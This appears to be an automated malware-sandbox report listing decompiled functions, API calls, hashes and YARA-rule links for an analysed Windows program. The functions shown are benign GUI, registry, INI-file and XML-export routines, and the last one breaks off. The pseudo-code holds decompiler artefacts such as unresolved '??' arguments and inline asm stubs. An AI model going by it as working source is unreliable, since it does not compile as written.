                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                                                          			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                                                                                                                          0x00402ed7
                                                                                                                                                                                                                          0x00402eee
                                                                                                                                                                                                                          0x00402ef8
                                                                                                                                                                                                                          0x00402f00
                                                                                                                                                                                                                          0x00402f01
                                                                                                                                                                                                                          0x00402f05
                                                                                                                                                                                                                          0x00402f0a
                                                                                                                                                                                                                          0x00402f1a
                                                                                                                                                                                                                          0x00402f30

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 19018683-0
                                                                                                                                                                                                                          • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                                                                          • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                          			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                                                                                                                          0x004079a4
                                                                                                                                                                                                                          0x004079b8
                                                                                                                                                                                                                          0x004079bd
                                                                                                                                                                                                                          0x004079c2
                                                                                                                                                                                                                          0x004079c5
                                                                                                                                                                                                                          0x004079c5
                                                                                                                                                                                                                          0x004079db
                                                                                                                                                                                                                          0x004079f7
                                                                                                                                                                                                                          0x00407a06
                                                                                                                                                                                                                          0x00407a0c
                                                                                                                                                                                                                          0x00407a11
                                                                                                                                                                                                                          0x00407a13
                                                                                                                                                                                                                          0x00407a14
                                                                                                                                                                                                                          0x00407a17
                                                                                                                                                                                                                          0x00407a18
                                                                                                                                                                                                                          0x00407a1d
                                                                                                                                                                                                                          0x00407a22
                                                                                                                                                                                                                          0x00407a25
                                                                                                                                                                                                                          0x00407a2a
                                                                                                                                                                                                                          0x00407a35
                                                                                                                                                                                                                          0x00407a3a
                                                                                                                                                                                                                          0x00407a3b
                                                                                                                                                                                                                          0x00407a40
                                                                                                                                                                                                                          0x00407a52

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004079DB
                                                                                                                                                                                                                            • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                                                                                                                            • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                                                                            • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                          • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                                                                                                                          • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                                                                                                                          0x00404683
                                                                                                                                                                                                                          0x00404692
                                                                                                                                                                                                                          0x00404699
                                                                                                                                                                                                                          0x0040469b
                                                                                                                                                                                                                          0x004046af
                                                                                                                                                                                                                          0x004046ba
                                                                                                                                                                                                                          0x004046bc
                                                                                                                                                                                                                          0x004046c7
                                                                                                                                                                                                                          0x004046cc
                                                                                                                                                                                                                          0x004046cd
                                                                                                                                                                                                                          0x004046ee
                                                                                                                                                                                                                          0x004046f3
                                                                                                                                                                                                                          0x004046fa
                                                                                                                                                                                                                          0x004046fa
                                                                                                                                                                                                                          0x004046ee
                                                                                                                                                                                                                          0x00404705

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004046AF
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpen_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %s\shell\%s
                                                                                                                                                                                                                          • API String ID: 1458959524-3196117466
                                                                                                                                                                                                                          • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                                                                                                                          • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                                                          			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                                                                                                                          0x00409d5f
                                                                                                                                                                                                                          0x00409d67
                                                                                                                                                                                                                          0x00409d70
                                                                                                                                                                                                                          0x00409ddb
                                                                                                                                                                                                                          0x00409d72
                                                                                                                                                                                                                          0x00409d74
                                                                                                                                                                                                                          0x00409db2
                                                                                                                                                                                                                          0x00409d84
                                                                                                                                                                                                                          0x00409d84
                                                                                                                                                                                                                          0x00409d8c
                                                                                                                                                                                                                          0x00409d8d
                                                                                                                                                                                                                          0x00409d98
                                                                                                                                                                                                                          0x00409d9d
                                                                                                                                                                                                                          0x00409d9e
                                                                                                                                                                                                                          0x00409da6
                                                                                                                                                                                                                          0x00409daf
                                                                                                                                                                                                                          0x00409daf
                                                                                                                                                                                                                          0x00409dc3
                                                                                                                                                                                                                          0x00409dc3

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00409D79
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                          • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                                                                                                                          • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                                          			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                                                                                                                          0x004047d2
                                                                                                                                                                                                                          0x004047da
                                                                                                                                                                                                                          0x004047e0
                                                                                                                                                                                                                          0x004047e4
                                                                                                                                                                                                                          0x004047ec
                                                                                                                                                                                                                          0x004047ec
                                                                                                                                                                                                                          0x004047f5
                                                                                                                                                                                                                          0x00404800
                                                                                                                                                                                                                          0x00404801
                                                                                                                                                                                                                          0x00404802
                                                                                                                                                                                                                          0x0040480d
                                                                                                                                                                                                                          0x00404812
                                                                                                                                                                                                                          0x00404813
                                                                                                                                                                                                                          0x00404834

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404813
                                                                                                                                                                                                                          • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                                                          • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                                                                                                                          • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                                                                                                                          0x004068ec
                                                                                                                                                                                                                          0x004068f0
                                                                                                                                                                                                                          0x004068f4
                                                                                                                                                                                                                          0x004068ff
                                                                                                                                                                                                                          0x00406902
                                                                                                                                                                                                                          0x0040690a
                                                                                                                                                                                                                          0x00406910
                                                                                                                                                                                                                          0x00406911
                                                                                                                                                                                                                          0x0040691b
                                                                                                                                                                                                                          0x0040691e
                                                                                                                                                                                                                          0x00406923
                                                                                                                                                                                                                          0x0040692d
                                                                                                                                                                                                                          0x0040692e
                                                                                                                                                                                                                          0x00406933
                                                                                                                                                                                                                          0x0040693d
                                                                                                                                                                                                                          0x00406940
                                                                                                                                                                                                                          0x00406949
                                                                                                                                                                                                                          0x0040694a
                                                                                                                                                                                                                          0x00406950
                                                                                                                                                                                                                          0x00406956
                                                                                                                                                                                                                          0x00406959
                                                                                                                                                                                                                          0x0040695c
                                                                                                                                                                                                                          0x00406964
                                                                                                                                                                                                                          0x0040696d
                                                                                                                                                                                                                          0x00406974
                                                                                                                                                                                                                          0x0040697e
                                                                                                                                                                                                                          0x00406989
                                                                                                                                                                                                                          0x00406990
                                                                                                                                                                                                                          0x00406998
                                                                                                                                                                                                                          0x0040699b
                                                                                                                                                                                                                          0x0040699f
                                                                                                                                                                                                                          0x004069b8
                                                                                                                                                                                                                          0x004069bc
                                                                                                                                                                                                                          0x004069c4
                                                                                                                                                                                                                          0x004069c7
                                                                                                                                                                                                                          0x004069c7
                                                                                                                                                                                                                          0x004069cb
                                                                                                                                                                                                                          0x004069ce
                                                                                                                                                                                                                          0x004069d4
                                                                                                                                                                                                                          0x004069d4
                                                                                                                                                                                                                          0x004069d9
                                                                                                                                                                                                                          0x004069df
                                                                                                                                                                                                                          0x004069e6
                                                                                                                                                                                                                          0x004069ea
                                                                                                                                                                                                                          0x004069ef
                                                                                                                                                                                                                          0x004069f2
                                                                                                                                                                                                                          0x004069f5
                                                                                                                                                                                                                          0x00406a00
                                                                                                                                                                                                                          0x00406a01
                                                                                                                                                                                                                          0x00406a06
                                                                                                                                                                                                                          0x00406a08
                                                                                                                                                                                                                          0x00406a0b
                                                                                                                                                                                                                          0x00406a10
                                                                                                                                                                                                                          0x00406a16
                                                                                                                                                                                                                          0x00406a25
                                                                                                                                                                                                                          0x00406a25
                                                                                                                                                                                                                          0x00406a18
                                                                                                                                                                                                                          0x00406a1e
                                                                                                                                                                                                                          0x00406a1e
                                                                                                                                                                                                                          0x00406a27
                                                                                                                                                                                                                          0x00406a2f
                                                                                                                                                                                                                          0x00406a32
                                                                                                                                                                                                                          0x00406a35
                                                                                                                                                                                                                          0x00406a3b
                                                                                                                                                                                                                          0x00406a41
                                                                                                                                                                                                                          0x00406a47
                                                                                                                                                                                                                          0x00406a4d
                                                                                                                                                                                                                          0x00406a53
                                                                                                                                                                                                                          0x00406a5d
                                                                                                                                                                                                                          0x00406a6d

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040696D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040697E
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 975042529-0
                                                                                                                                                                                                                          • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                                                                          • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
